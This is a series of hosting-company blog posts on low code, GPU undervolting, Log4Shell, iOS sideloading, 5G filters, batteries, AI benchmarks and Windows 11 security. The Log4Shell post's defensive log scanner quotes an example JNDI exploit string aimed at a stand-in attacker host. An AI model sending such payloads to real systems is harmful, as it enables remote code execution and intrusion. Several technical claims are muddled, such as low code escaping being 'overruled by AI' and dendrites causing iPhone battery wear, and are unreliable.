Slowing the Low Code Hype Train

Here we are with another new calendar year opened up, and you’ll be forgiven if January ’22 finds you the same as you were at this time last year, with some sense of bewilderment at how developer technologies and methodologies are expanding in leaps and bounds. Part of that has been low-code technology, which was forecast to grow in adoption by around 22% for 2021 and by all indications did at least that. It’s also estimated that by 2025, 70% of new applications will be built with low-code or no-code technologies.

What we have on the plate today is 3rd-generation low-code technology that improves on the 2 generations preceding it. It gives enterprises the ability to build anything from the simplest to the most complex applications and to scale them to whatever extent is needed, without limitations. It’s also known for providing the built-in controls and functionality required for enterprise governance while fostering more collaborative team working environments too.

It is conducive to the type of digital applications enterprises need to be able to create quickly and then adapt easily as needs change. Here at 4GoodHosting we imagine we’re like any good Canadian web hosting provider in that we’re able to see the real relevance in that, and accordingly why there’s so much hype about low code and the applications built with it.

But perhaps there’s reason to pull on the reins a bit there

The Pros

Low code can be helpful for building an MVP and fleshing out concepts within a small scope, with precise product requirements and an understanding that any scaling will be limited. But many times, as the project progresses, processes need to be upgraded. Without a low-code solution your ability to scale is very limited, and it can be more costly too.

Then from the developer’s perspective, choosing low code to complete small-scale projects and prototypes or to build basic solutions is almost always faster and comes with fewer hiccups. Keep in mind though that most professionals will prefer to code from scratch when working on complex projects, on account of the flexibility that provides them. While there is always a chance that a low-code platform won’t allow you to create a product meeting new or changed requirements, that’s usually no deterrent.

Scalability really is the key benefit of low-code development, and the opportunity for and cost of horizontal and vertical scalability are primary factors when a vendor is being chosen. The benefits for accommodating changing numbers of daily active users, available features, storage, and expanded computing power are considerable and weigh heavily in favour of this type of development.

It also allows you to escape being overruled by AI when a site experiences a large influx of visitors and you would otherwise have access limited and / or be forced to upgrade. This is a huge issue in the SaaS sector right now, and it’s one that’s pushing developers there to have greater interest in going low-code moving forward.

The Cons

Starting at the start here with the drawbacks to building with low code, the first is extensive training requirements. There’s usually a lot that goes into implementing a low-code solution, and that usually manifests itself in significant delays in deployment. For many people, foreseeing this is what leads them to stick with agile development in order to get to market in the timeframe that’s been envisioned for the product.

The next issue is timeframe variances related to factors other than development tools and methodologies, variances that range from weeks to months and depend on the quality of the available documentation and support. The fact there isn’t an industry standard means every platform will have its own unique system. If an industry standard did exist that would change things instantly, but of course the question is who would define it, based on what criteria, and with what authority to do so?

Troubleshooting is difficult with low-code development too. When something goes wrong, a successful remediation will depend on the quality of the documentation, the response speed, and the competence of the dev team and their support. Debugging a program built with low code may be difficult or flat-out impossible, and vendor lock-in is another possible negative if the solution isn’t compatible with any competitor or similar provider.

You may need to depend on the vendor’s platform to work, and you may only be able to use it as a backup. Plus migrating to another service is often nearly impossible; you may well have to start over again from scratch.

One Tool Like Others

The simplicity and scalability of low code make it appealing, but it shouldn’t be seen as the be-all solution to be rolled out by default for every task. Make sure you have a deep understanding of the niche you’re working in, so you have a strong grasp of the demands of the product you’re building and how they might be tested against a vendor’s capabilities.

Pros & Cons for Undervolting Graphics Cards

Hoping that everyone is enjoying the holidays, had a good Christmas, and has an enjoyable NYE 2022 on deck. During the Xmas holidays a lot of people find time for entertainment that’s not as easily found during the rest of the year. For some people that entertainment is best enjoyed via their computer, and for many there’s nothing better than games. They’ve come a long way over the last decade-plus, and usually in order to get all the visual pop and immersive experience the game developers want you to have, you need a good GPU.

Lots of people are perfectly fine with the one that came in their desktop, and not many of them will be the type inclined to perform invasive surgery on computing devices in the first place. For others with the know-how and no hesitation about performing ‘tweaks’, it is possible to make small changes to computer components that will alter how they function. One of these procedures that gamers will probably at least have heard of is undervolting the GPU. To describe it plainly, it means restricting the power that the card has access to and gaining specific performance benefits because of it.

This is not something that would generally be familiar territory for a Canadian web hosting provider, but here at 4GoodHosting we are good at identifying what might be of interest for people who are tech-savvy in this way, and it turns out that undervolting isn’t especially difficult to do. So it’s something that might be possible for you if you’re an avid gamer, and what we’ll do here with the last entry for 2021 is talk about the advantages and disadvantages of undervolting graphics cards.

Efficiency Boost

Your GPU has a few important calibrations that are open to manual adjustment with software like MSI Afterburner. These include the power limit, core and memory clocks, plus the voltage. They all work in unison to provide the performance and power expected from out-of-box operation.

So what exactly is undervolting? Simply, it is a reduction of the voltage your GPU has access to and the primary aim is to maintain the performance associated with stock settings while at the same time boosting efficiency. Undervolting takes specific aim at power draw and heat as areas where improvements can be made.
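
If you want to actually see what an undervolt is doing on your card, a minimal sketch along these lines can help (assuming an Nvidia GPU and the pynvml Python bindings, installed with pip install pynvml). It simply samples power draw, temperature, and core clock so you can compare readings before and after applying an undervolt in a tool like MSI Afterburner.

import time
import pynvml

# Sample GPU power draw, temperature, and core clock once per second
pynvml.nvmlInit()
gpu = pynvml.nvmlDeviceGetHandleByIndex(0)  # first GPU in the system

try:
    for _ in range(10):
        power_w = pynvml.nvmlDeviceGetPowerUsage(gpu) / 1000  # NVML reports milliwatts
        temp_c = pynvml.nvmlDeviceGetTemperature(gpu, pynvml.NVML_TEMPERATURE_GPU)
        clock_mhz = pynvml.nvmlDeviceGetClockInfo(gpu, pynvml.NVML_CLOCK_GRAPHICS)
        print(f"power: {power_w:6.1f} W | temp: {temp_c:3d} C | core clock: {clock_mhz} MHz")
        time.sleep(1)
finally:
    pynvml.nvmlShutdown()

Run it under a steady load, note the numbers, apply your undervolt, and run it again under the same load to see whether power and heat actually dropped.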

The first question is this, then: if a GPU is able to run better at a lower voltage, why wouldn’t the manufacturer build them with this in mind? The answer is that silicon quality can vary with each individual GPU, and some chips will tolerate different voltages and clocks better than others. Standard settings will be aligned with whatever is known to be the average tolerance.

The most noticeable differences will be with a GPU that’s built to be power hungry, and the Nvidia RTX 30-series Founders Edition cards are among them. Undervolting a card like this may offer many improvements, especially in demanding applications. A lower-power GPU will put out less heat to begin with, so you’ll have less to gain by undervolting one of those.

Pros / Cons for Undervolting

We should start by saying that most of the time it will actually be best to leave your GPU at stock settings. Some users will also choose an automatic overclocking tool as a cost-effective and simply implemented means of regulating graphics card performance.

Pro 1: Lower power consumption will promote lower heat. This means a reduced power bill, even if it’s not much lower. Less heat can also equate to better thermal performance for your other surrounding components like the CPU. Modern GPUs tend to come with plenty of power, so undervolting can be very beneficial for mitigating the effects on your PC ecosystem. Plus your power supply will be less stressed.

Con 1: You’ll need to spend time familiarizing yourself with settings on the GPU. While undervolting is not especially difficult, it does require some knowledge and ability to tinker around effectively and neglecting that may mean you do permanent damage to the GPU.

Pro 2: Familiar software like MSI Afterburner makes it free to do, and generally it’s not too risky. Keep in mind as well that undervolting may also help prolong the life of your GPU because it will be under less thermal stress over time.

Con 2: Further tinkering may be required in the future. New driver updates or changing ambient temperatures are two of the reasons you may sometimes have to go in and adjust your settings for optimal performance.

Pro 3: Undervolting is ideal when you’re fitting a powerful GPU into a small form factor enclosure, because it makes for a much better experience. Small cases are usually more restrictive for heat dissipation, so you’ll enjoy better thermals in these smaller spaces without the performance compromises you might otherwise see with a card that hasn’t been undervolted.

Con 3: You may end up applying incorrect settings without being aware of it, with poor performance as the result. If the GPU receives insufficient voltage or it isn’t properly applied, there may be overall instability and reduced frame rates. Double checking and testing your GPU performance to ensure it’s actually improving with voltage changes is always a good idea.

Pro 4: Less noise. The lower voltage will make it so that the GPU fans can spin at lower RPMs with the accompanying reduced heat. This also means less power is needed for the fans, and that keeps the entire system performing at a lower noise level.

Rent Out Computing Power for Access to Apps and Services

There’s the old expression ‘take only what you need’ and it’s good advice in all sorts of situations. It’s easy enough to follow at an all-you-can-eat buffet once you’ve eaten all you can, but when it comes to the processing power in your computers at home, you get what was given to you when the device was put together. Some people put the entirety of that processing power to work for them, but most people don’t use anywhere near all of it. And in truth the majority of people may not even know what they actually have at their disposal.

Some will though, and it’s these people who will want to take note of a new decentralized Internet platform that will let people pay for their apps and services by making their idle computing power available to those who can put it to use. As a quality Canadian web hosting provider, this is something that resonates with us here at 4GoodHosting, because like any host we can relate to what it’s like to have real constraints around computing power, and in the industry there’s long been roundabout talk about whether something like this might become possible someday.

It has made a lot of sense for a long time, but like many things it takes time to get the wheels sufficiently in motion to see things start to happen. But that’s what’s happening now with Massive, an app monetization startup that’s set to make some serious waves.

Smart Decentralization

Massive has just recently closed an $11 million seed round, which will let it move forward with a monetization software development kit that can support the project and take a small yet noteworthy step toward decentralizing the internet and making it possible for people to pay for apps with their idle compute power.

This is an impressively unique potential solution, one that will benefit the individual consumer but also improve how app developers and service providers make money for the work they do. As it is now they usually charge users money, and it’s fairly standard to have a one-time app download fee or subscription services that come with a monthly charge. There are some who want to make their work free to the public and will set up their compensation by implementing on-screen ads, and nearly everyone will know the type from the apps they use.

This is especially common for mobile games and sometimes it is preferable because upfront costs often turn off new customers. But ideally most people will enjoy an ad-free experience, and that may be what’s soon to be possible if people have the means of renting out their CPU power.

Expanding on Distributed Computing

What is being proposed here is taking the concept of distributed computing – utilizing extra CPU cycles on otherwise idle machines – and reinventing it as a legitimate payment method. Looking at how it works, it is not unlike how individuals can rent out their unused vehicles and homes on Turo and Airbnb. The unused compute power is exchanged for a passive means of paying for apps and services already being used and enjoyed.

Some might say this sounds a little invasive because the space and power are going to be utilized on a personal device, and it may seem that way to those who aren’t familiar with distributed computing. However, Massive is adamant that it will be putting a priority on security and digital consent, with promises on their website that users will need to opt into the model to participate, plus be able to opt out at any time.

They’re also very upfront about their wish to be a part of dismantling the internet’s reliance on nosy marketing practices. The idea is that this new arrangement opportunity will reduce the amount of personal information users unwittingly give away, and it is true that antivirus protections are going to be thoroughly incorporated into Massive’s CPU-sharing software.

They are working with third-party partners to bring this model to customers, but as of now Massive is only compatible with desktop apps. Plans are in the works to bring the opportunity to mobile, although that may be a good ways down the road. Currently more than 50,000 computer users have already opted in, and that’s a very strong reflection of the high level of interest there’s going to be from people who like the idea of ‘bartering’, in a way, for their apps and services.

New Log4Shell Open-Source Apache Software Vulnerability a Major Problem

It has certainly been a while since we’ve had a nasty bug making enough of a stink that it warrants being the subject of one of our weekly blog posts, but here we are again. The good thing has always been that these software vulnerabilities are usually quite limited in the scope of what they’re capable of, and that means they usually don’t get much fanfare and they’re also usually fairly easily dealt with via patches and the like.

The problem comes when the bug is rooted in software that is ubiquitous in cloud servers and in enterprise software used as much by government as it is by industry. That’s the scenario with the new Log4Shell software vulnerability that has the Internet ‘On Fire’, according to those who are qualified to determine whether something is on fire or not. All joking aside, this is apparently a critical vulnerability in a widely used software tool, and – interestingly enough – one that was quickly exploited in Minecraft.

But now it is emerging as a serious threat to organizations around the world, and here at 4GoodHosting, like most quality Canadian web hosting providers, we like to keep our people in the know when it comes to anything so far-reaching it might apply to a good number of them.

Quick to be Weaponized

Cybersecurity firm Crowdstrike is as good as any for staying well on top of these things, and what they have to say about Log4Shell is that within 12 hours of the bug announcing itself it had been fully weaponized. That means tools had already been developed and distributed for the purpose of exploiting it. All sorts of people are scrambling to patch, but just as many are scrambling to exploit.

It’s believed this software flaw may be the worst computer vulnerability to come along in years. As hinted at, it was discovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. If allowed to continue unchecked it has the potential to give criminals, spies, and programming novices alike no-hassle access to internal networks.

Once in they can loot valuable data, place malware, wipe out crucial information or do a whole lot of other types of damage. And it seems to be that many different kinds of companies could be at risk because their servers have this utility installed in them and we’re still in the early stages of fallout with this.

Cybersecurity firm Tenable goes one step further in describing it as ‘the single biggest, most critical vulnerability of the last decade’ and maybe even the biggest one in the history of modern computing.

10 / 10 Cause for Alarm

We also have Log4Shell being given a 10 on a scale of 1 to 10 for cause for alarm by the Apache Software Foundation, which oversees development of the software. The problem is that anyone with the exploit can obtain full access to an unpatched computer that uses the software, and it’s specifically the extreme ease with which an attacker can access a web server through the vulnerability, without a password, that makes it such a major threat.
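
A lot of the early detection guidance boiled down to searching logs for the ${jndi: lookup string that attackers send in requests hoping it gets logged. Here’s a rough Python sketch of that idea; the pattern and usage are illustrative only, and real-world checks used broader patterns to catch the obfuscated variants that quickly appeared.

import re
import sys

# Strings resembling the Log4Shell JNDI lookup, e.g. ${jndi:ldap://attacker.example/a}
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def scan_log(path):
    hits = []
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            if JNDI_PATTERN.search(line):
                hits.append((lineno, line.strip()))
    return hits

if __name__ == "__main__":
    # Usage: python scan.py access.log
    for lineno, line in scan_log(sys.argv[1]):
        print(f"possible Log4Shell probe at line {lineno}: {line}")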

A computer emergency response team in New Zealand was the first to report the flaw being actively exploited in the wild, just hours after the first patch was released in response to it. This was weeks ago now, and the hugely popular online game Minecraft was where the first obvious signs of the flaw’s exploitation were seen, and the fact the game is owned by Microsoft shouldn’t be overlooked.

It was reported at the same time that Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box. A software update for game users followed shortly after, and customers who apply the fix are protected. But the ‘fire’ isn’t contained by any means – researchers have reported finding evidence the vulnerability may also be exploited in servers operated by companies like Apple, Amazon, Twitter and Cloudflare.

The Case Against Sideloading Apps onto iOS

Android and iOS are definitely two entirely different worlds when it comes to the default choices between mobile devices, and you’d have trouble finding any more than just a few people who don’t take advantage of apps for their smartphones nowadays. Depending on who you are that may be for entertainment or personal pursuit aims, or it may be for making your workdays that much more productive and streamlined. All sorts of possibilities out there for what you can do with apps and it sure is a whole lot different from where we were just 10 or so years ago.

Once you’ve got a taste for them it’s hard to go back, and you won’t want to be thwarted in your attempts to get one onto your device if you see the need for it. The reason that sideloading apps – installing apps without getting them from official sources (namely Android Market or the App Store) – is as popular as it is, is because both Google and Apple have been fairly free with allowing certain carriers to block certain applications based on model and network. There are plenty of people with phones only a couple of years old that are already encountering roadblocks, and sideloading the app allows them to get around that.

In the bigger picture though it’s not good for the development of better app versions in the future, as those developers don’t get what they should for their work and that’s something we can relate to in a roundabout way as a good Canadian web hosting provider. We certainly know all that goes into allowing people to enjoy the digital connectivity they do nowadays.

So not to pick sides, but recent information seems to suggest that sideloading apps for Android is not so bad as it might be for iOS devices. Let’s look at why that is.

Privacy & Security Concerns

Apple has come right out and made it clear that there’s plenty of evidence indicating sideloading apps through direct downloads and 3rd-party app stores would weaken privacy and security protections that have made their iPhone as secure as it’s been regarded to be all these years. They’ve even sent a letter to US lawmakers raising similar concerns about legislation that would require app store competition and mandate support for sideloading.

The focus here is more on sideloading apps installed by users on a device without the involvement of a trusted intermediary performing an oversight function, at least to some extent. It is true that downloading an iOS app from a website and installing it isn’t the same as downloading one from an app store operated by Google or Microsoft. Whether a 3rd-party app store might offer better security and privacy than the official app stores is a legitimate question.

A lot of the concerns will be based around the fact that Apple only spends an average of 12 minutes or so reviewing each iOS app. Apps offered elsewhere than the iOS app store may be backed by a more detailed app review, and better for disallowing all third-party analytics and ad SDKs. Long story short apps that cost more elsewhere might be worth it after all, but generally you’re not going to find any versions of such being available for sideloading anyways.

Android Difference

Part of why Apple disapproves of sideloading is in the interest of users, as it believes Android has poorer security because it supports sideloading. It is true that one survey found Android devices have 15 to 47 times more malware infections than iPhone, so there is some truth to this, although the size of the user base has to be taken into consideration too.

To be fair though, Apple does not put out a Transparency Report the way Google does for Android. Security issues may be more visible on Android than iOS, but that is a reality of iOS being less accessible to researchers. According to the most recent version of that report, only about 0.075% of devices running Android 11 during 2021 Q2 had a PHA (potentially harmful application), and that includes devices that sideloaded apps.

It does need to be said though that security issues on Android are partly a reflection of Google’s inability to force operating system upgrades on devices sold by other vendors. As a result, older Android versions with vulnerabilities hang around the market longer. That’s a consequence of Android’s multi-vendor ecosystem rather than the perils of sideloading.

The Case

Here are the risks a person could assume by sideloading apps onto an iOS device:

  • Greater numbers of harmful apps reaching users, due to how easily cybercriminals can target them this way, especially through sideloads limited to 3rd-party app stores.
  • Users having less up-front information about apps with which to make informed decisions about whether or not to add them to the device, and less control over those apps once they’re on the device.
  • Protections against third-party access to proprietary hardware elements may be removed, and non-public operating system functions may be distorted or misaligned.
  • Sideloaded apps needed for work or school may put users at a direct disadvantage.

Other Considerations

Another thing to keep in mind is that sideloading does increase the attack surface in iOS at least to some extent, although to be fair the App Store has had more than a few scam-geared and insecure apps themselves over the years. The security afforded by iOS is a legit benefit, largely due to security features built into the operating system, like app sandboxing, memory safety, permission prompts, and others.

It is also always advisable to look for reviews of an app before sideloading it. External sites are often best for this, as reviews in 3rd-party app sources may not be genuine, and the practice of planting app reviews is well established. Proceed with caution as with everything else.

New Exclusive C-Band Filters Set to Get 5G Past Federal Aviation Hurdles

The promise of what 5G will be capable of doing with regards to revolutionizing the digital world has the entirety of the planet clamouring for it to be rolled out in full as soon as possible. As is the case with any major game-changer though, there’s the potential for collateral damage if that’s not done in a calculated way. Putting airline passengers at risk because of signal interference related to 5G is exactly the type of risk that wouldn’t be acceptable, and that’s why earlier this month Canada’s Department of Innovation, Science, and Economic Development (ISED) introduced restrictions on certain 5G services in and around airports.

This is because they would interfere with radio altimeters, which are a very important component of aircraft navigation systems that tell pilots where their planes are relative to Earth. Everyone gets the importance of safety in this regard, but that isn’t going to do much to quell the displeasure of someone with a 5G-enabled device who finds themselves in a bind due to something work-related in the departure lounge before flying out. Or any number of other possible scenarios.

Here at 4GoodHosting we’re like any other quality Canadian web hosting provider in that we’re as keen as anyone to dive into what 5G is going to be capable of, and given that the majority of you reading this are likely tech-savvy and forward-looking in that way too, we thought we’d share some positive news with this week’s entry – chip giant Qualcomm may already have a potential workaround that could mean the ISED’s restrictions are short lived.

Band Exclusivity is Key

What they have developed is a new set of filters called UltraBAW, which are capable of making sure C-band receivers and transmitters only work on the C-band. While it is true that such filters already exist, and that existing C-band devices and transmitters already have them, these new filters will have a sharper cut-off for frequencies over 3GHz than existing ones. This means the guard bands won’t need to be as broad as they are now around transmissions at those frequencies.

Guard bands and filters have been at the heart of the controversy regarding the risk to aviation safety for some time now. The aviation industry has taken the position that either airplanes’ altimeters will be confused by C-band transmissions or C-band towers will leak out of their assigned bands, creating a very real signal-crossing / signal-misreading risk.

Co-existence + Better Filters, Better Hotspots

To date the majority of high-performance filter technologies have been focused on frequencies below 3GHz, as that is where most wireless action was located. Filtering between the 2.4GHz Wi-Fi band and the very nearby 2.3GHz WCS band has been critical to mobile device performance and that’s true for nearly every device and network, and even in crossovers between them.

The longstanding filter challenge for 5G is around 1-3GHz and in moving up into higher frequencies. The 5GHz Wi-Fi band has coexisted with public safety, radar, and satellite systems just fine for many, many years, but 5G assignments are hemming them in much more profoundly now, and if left unchecked that was going to become a big problem fairly soon.

Domestic Application Too

UltraBAW is going to come well into play with home 5G internet too. It cuts a sharp line between the top of 5G frequency band N79 and the bottom of 5GHz Wi-Fi, and it is possible the N79 band could be repurposed for civilian use in the future too. A better filter means you do not have to turn down the volume of your access points, avoid specific channels, or alternate between transmitting on different networks.

All of these things reduce data rates and signal range, and so this new filter for making 5G safe in and around airports is also likely to make its way into the everyday consumer market by means of being incorporated into modems, hubs, and the like. In fact it is expected that it will end up in hundreds of different kinds of products. For starters, it is expected that it will be integrated into Qualcomm’s next Snapdragon chipset, a name that anyone who is even remotely familiar with the workings of handheld mobile devices is almost certainly going to recognize right away.

Big Battery Advances Coming with Solid State

Safe to say audiophiles of today aren’t cut from the same cloth as those that came well before them, and it’s also true that there’s less of a focus on good and pure sound today than there was even a couple of decades ago. It is what it is, and in fairness all of this has nothing to do with new technological advances related to the devices we love to use or need to use. Where we’re going with this is that solid state receivers – the ones that replaced the old tube units with their light orange glow when powered up – delivered clear, crisp, and authoritative sound in a way that lesser receivers couldn’t even come close to.

Solid State amplifiers have long been the preferred choice for professional musicians too for the exact same reason. They just sound a whole lot better, and it seems that all the power goodness that comes with Solid State electrical engineering is about to flip reality on its head once again with batteries for digital devices. Mass produced solid-state batteries are going to change everything, and we’re all going to be thrilled with it.

Any quality Canadian web hosting provider is going to be able to appreciate what it is to need big power, and look no further than the fact that most of the others will be just like us at 4GoodHosting in that we know what goes into powering massive data centres and the like. That’s macro scale stuff for sure, but there is plenty we already know about these solid-state batteries that are just around the corner and it is really promising stuff for sure.

Meeting CPU Needs

There is no getting around the fact that even the most power-frugal processor is going to put serious demands on battery power. From phones to cars to cameras and beyond, battery power is usually going to be an issue, more often than not because there’s just not enough of it in one full charge. Lithium-ion batteries aren’t as safe as they need to be, and producing them is nasty for the environment with all the rare earth minerals that have to be mined for them.

If we’re able to replace lithium-ion batteries and retire the technology, it really can’t happen soon enough. So here we are with big news about solid state batteries, starting with their utilization in electric vehicles. The solid-state battery industry for EVs is estimated to be worth $4.3 billion US by the end of 2027. Improving on the battery technology for these types of vehicles is important because we need to move past the internal combustion engine as soon as possible, for obvious reasons.

QuantumScape is a company that has apparently solved the issue of dendrite formation – which occurs when the battery is under load from fast charging. If you didn’t know there was a drawback to fast charging, now you do. Eliminating dendrite formation is part of what will allow solid-state batteries to charge to 80% capacity within 15 minutes without degrading the structural integrity of the battery each time it’s charged.

Yes, this is why your iPhone battery gets progressively worse the longer you own the device. And yes, Apple’s been perfectly fine with that as part of the bigger picture of sneaky planned obsolescence, which has had people buying new phones earlier than they’d like to for years now. At least they are now making repair parts available. It’s a start.

Why Solid State is Better

Let’s get right to it – solid-state batteries do not contain a volatile liquid component, so their power density is much higher and they are also much, much safer. Plus, a solid-state battery will not catch fire like a Li-ion one might. That’s a huge plus in itself.

This increased energy density also means that the batteries can be considerably smaller. The overcoming of dendrite formation makes solid-state batteries capable of being charged many more times than a traditional Li-ion battery without degradation. As we also touched on, there’s not nearly the same environmental footprint to producing them either.

Specifically for smart devices:

  • Increased battery life and charge cycles
  • Devices will run much cooler
  • WAY faster charging without compromising the integrity of the battery

It may not be until around 2025 when we start to see this technology incorporated on a large scale with consumer devices, but it is coming and it’s going to be a fortunate turn of events.

AI Is Becoming Speedier

Artificial Intelligence has been a work long in progress, but in recent years we are definitely starting to see it make more of a mark. Its capacities were never in question, but the speed with which those capacities could be put to work sometimes was. Not that performance speed is always necessary with AI-related tasks, but sometimes speediness is definitely of the essence. For example, AI is earmarked for an extensive role in healthcare in the future, and that’s one area where both accuracy and quick results are definitely going to be required.

Recent AI performance testing results came out a little more than a month back, and what they’ve shown is that AI is getting faster, which is great news for an increasingly digital modern world. The future of it is of great interest to us here at 4GoodHosting, in the same way it would be for any Canadian web hosting provider that enjoys having an eye on the future and what it will entail for IT and all that grows along with it.

This measuring of general AI performance follows the first official set of benchmarks released earlier and lays out 350 measurements of energy efficiency. Most systems measured improved by between 5-30% from previous testing, and some were more than 2x better than their previous performance stats.

So what is the significance of this, and what will it mean in relation to development? That’s what we’ll look at here this week.

6-Way Performance Testing

This testing involved systems made up of combinations of CPUs and GPUs or other accelerator chips being tested on six different neural networks performing an array of common functions—image classification, speech recognition, object detection, 3D medical imaging, natural language processing, and the ability to make logical recommendations. Computers meant to work onsite instead of in the data center had their measurements made in an offline state, to recreate receiving a single stream of data and measure against least-ideal pathway instances.

When it comes to the AI accelerator chips used in the tested machines, most notable were software improvements that delivered up to a 50% improvement in performance. Typically this was for 1 or 2 CPUs plus as many as 8 accelerators. Of all the ones tested, the Nvidia A100 accelerator chips tested best and showed the most potential.

Multi-Instance GPUs Show Huge Promise

Nvidia has also created a splash with a new software technique called multi-instance GPU (MiG), which allows a single GPU to assume the roles of seven separate chips from the point of view of software. Tests that had all six benchmarks running simultaneously plus an extra instance of object detection came back with solid results that were 95% of the single-instance value.

It should be noted here though that supercomputer testing doesn’t usually lend itself to conventional result categorizing, and the only part of it that really does is efficiency testing, which is based on inferences per second per watt for the offline component (a tiny worked example of that metric follows the list below). There is much that was revealed in the tests based on this metric, but what’s probably more valuable here is to highlight the new industry benchmark for this performance, the new TPCx-AI benchmark, which is based on:

  • Ability to generate and process large volumes of data
  • Training pre-processed data to produce realistic machine learning models
  • Accuracy in generating insights for real-world scenarios based on the generated models
  • Scalability for large, distributed configurations
  • Level of flexibility for configuration changes to meet changing AI landscape demands
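
For anyone curious about the efficiency metric mentioned above, here’s a tiny worked example of inferences per second per watt; the numbers are made up purely for illustration.

# Hypothetical offline-run numbers, for illustration only
total_inferences = 1_200_000   # inferences completed during the run
run_seconds = 600              # length of the run
avg_power_watts = 350          # average system power draw during the run

throughput = total_inferences / run_seconds     # 2000 inferences per second
efficiency = throughput / avg_power_watts       # roughly 5.7 inferences per second per watt
print(f"{throughput:.0f} inf/s, {efficiency:.2f} inf/s/W")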

Accurate Data, On the Fly

The new TPCx-AI puts the priority on real, genuine, and accurate data that can be reliably generated on the fly. It seems very likely that this new benchmark will be quickly adopted as the gauge by which AI processing speeds and the data produced are evaluated. Having this data generated upon request and with some speediness in getting that data is going to be huge pretty much right across the board.

Deep learning neural networks and GPU hardware are going to play a big role in all of this too, and natural language processing is going to be a must if AI is going to be conversant in the way it needs to be to serve people in other parts of the world too. There’s reason for optimism here as well, as an exponentially increasing number of highly accurate captions have been written purely by AI. They’re generated in milliseconds and delivered directly to customers without manual involvement.

All of this has dramatically increased the speed, quality, and scalability of alert captions – the exact type of data language that is most important much of the time when it comes to applications for artificial intelligence in improving the quality of life for people in the future.

Improving on Windows 11 Threat Protection

There have always been two tribes when it comes to computing device preferences: you’re either a Mac or a PC. Those who prefer Macs will usually have a long list of reasons why they prefer them, and some will point to their perception of more solidity when it comes to defending against web-based threats. Those are threats you are not going to be able to steer clear of if you’re accessing the web, and that’s why robust virus protection and other types of protection are super important no matter what type of device you’re using.

Whether Macs are more secure than PCs certainly hasn’t been proven definitively, and people who prefer PCs will have their own long list of reasons why. Neither type is completely impervious to threats of these sorts, but recently a lot has been made of the shortcomings of Windows 11 when it comes to device security. Here at 4GoodHosting we are definitely attuned to how this is a top priority for a lot of people, and like any other Canadian web hosting provider we can relate to how it’s not something you brush aside if operating your business means collecting and retaining sensitive data.

Which leads us to the good news we’re choosing to dedicate this week’s entry to – there are ways that users can improve threat protection for Windows 11 devices and they are not overly challenging, even for people who aren’t the most tech savvy.

Minimal Protection Built In

Windows 11 is an upgrade on its predecessor when it comes to device security, particularly with TPM and Secure Boot plus the guarantee of future security updates that comes with them. The problem is that TPM and Secure Boot only protect against two types of threats, and their effectiveness is entirely tied to hardware configuration. If detection can’t be done based on the signature of the BIOS drivers and their relation to the OS, then you’re out of luck when it comes to threat detection.

So here are the threats, and what you can do to improve security on a Windows 11 device to defend against each of them more effectively:

  1. Social Engineering

Actions taken on your PC determine your level of risk. Clicking on links, downloading files, installing programs or plugging in external USB drives without using caution and judgment isn’t wise. Doing so can create the problems that security hardware and software try to shield you from. And just because you received it from a trusted source doesn’t mean the link, program, or drive itself is to be trusted.

The same can be said for making personal information available, like your birth date, location, phone number, social security number, and so on, because it can be used to gain unauthorized access. And many times when something does occur, the biggest part of the headache is that the access extends to your linked Microsoft account and other services. You should also be sure not to store certain kinds of sensitive information in a non-encrypted file (e.g., a Word doc) or share it via non-encrypted forms of communication – email or text message.

  2. Viruses and malware

Malware can be a major source of problems for devices running Windows 11, and the truth here is that the best defense against those threats is to be careful in your daily routine. But you will still need quality antivirus software for Windows 11, and Windows Security, Microsoft’s packaged solution that comes with the operating system, is functional enough. For basic internet security it’s fine, but for anyone whose usage needs or inclinations leave them more exposed to threats it is just not sufficient.

Choosing to install 3rd-party software is an option, but you may not need to assume that expense. Some people choose to augment Windows Security with a more malware-specific program that provides a little more protection. Don’t go overboard with layering them though, as they can end up conflicting with each other and being less effective as a result.

  3. Open Incoming Ports

With Windows 11 the user will need to keep access to incoming ports blocked in order to prevent being exploited through them. Going with no firewall on your PC is the same as leaving a house with all of its doors not only unlocked but actually wide open. When incoming ports are left completely exposed, anyone on the internet can attempt to exploit services on your computer available through those ports. When that happens successfully, you’re going to have problems.

The firewall will close them up, and many home routers have a built-in hardware firewall. However, you can’t fully rely on those, and individual device protection is needed to go along with network-oriented protection. Windows 11 provides sufficient built-in firewall protection, but you need to make sure it is turned on in the Windows Security app.
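
If you’d rather confirm that from a script than click through the Settings app, a quick sketch like this (Windows only) just shells out to the built-in netsh command and flags any profile that reports its state as off.

import subprocess

# Ask Windows for the firewall state of all profiles (Domain, Private, Public)
result = subprocess.run(
    ["netsh", "advfirewall", "show", "allprofiles", "state"],
    capture_output=True, text=True, check=True,
)
print(result.stdout)

if "OFF" in result.stdout.upper():
    print("Warning: at least one firewall profile appears to be turned off.")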

  4. Data Leaks

It is actually impossible to entirely stop data from being leaked onto the web, and the reality is breaches and leaks are an unavoidable part of life. Windows 11 may have an acceptable level of security, but if the password you have for your linked Microsoft account is the same one used for other services then the basic protections that come with the OS aren’t going to save you from unauthorized account access.

Piece of advice #1 here is not to reuse passwords. When creating them you should come up with a strong, random, and unique password for every service and website used, plus immediately change your password anywhere there’s been a breach or leak. Password managers are a good choice – they can keep track of all of those random character strings safely so you don’t need to remember them individually.
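
Here’s a minimal sketch of what ‘strong, random, and unique’ means in practice, using Python’s built-in secrets module; a password manager does this for you, but the idea is the same.

import secrets
import string

def generate_password(length: int = 20) -> str:
    # Draw each character from letters, digits, and punctuation using a cryptographic RNG
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # generate a different one for every site, and store them in a manager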

Two-factor authentication is also good for beefing up defenses against data leaks. It may be that the second step in the login process is what ends up thwarting attempts to access your account. The most secure method is a hardware dongle, but most of you will find that a mobile app that generates a code provides an ideal balance between security and convenience.

  5. Spying on your Internet Traffic

Every network has the data being requested and sent to individual devices on display for anyone who knows where to look (packet sniffing). When a network is more open, it is easier for this to happen. Public Wi-Fi networks are the worst for this risk, particularly when data is not encrypted. In that scenario the exact information you’re transmitting may be visible too, and that can be a big problem, obviously.

If data being transmitted is sensitive, then a VPN is the best choice. It will create a secure tunnel that your traffic is funneled through. Use a VPN on your devices when on public Wi-Fi networks and you’ll be MUCH better protected.

Continuing Merits of Tape Storage for Petabyte Data

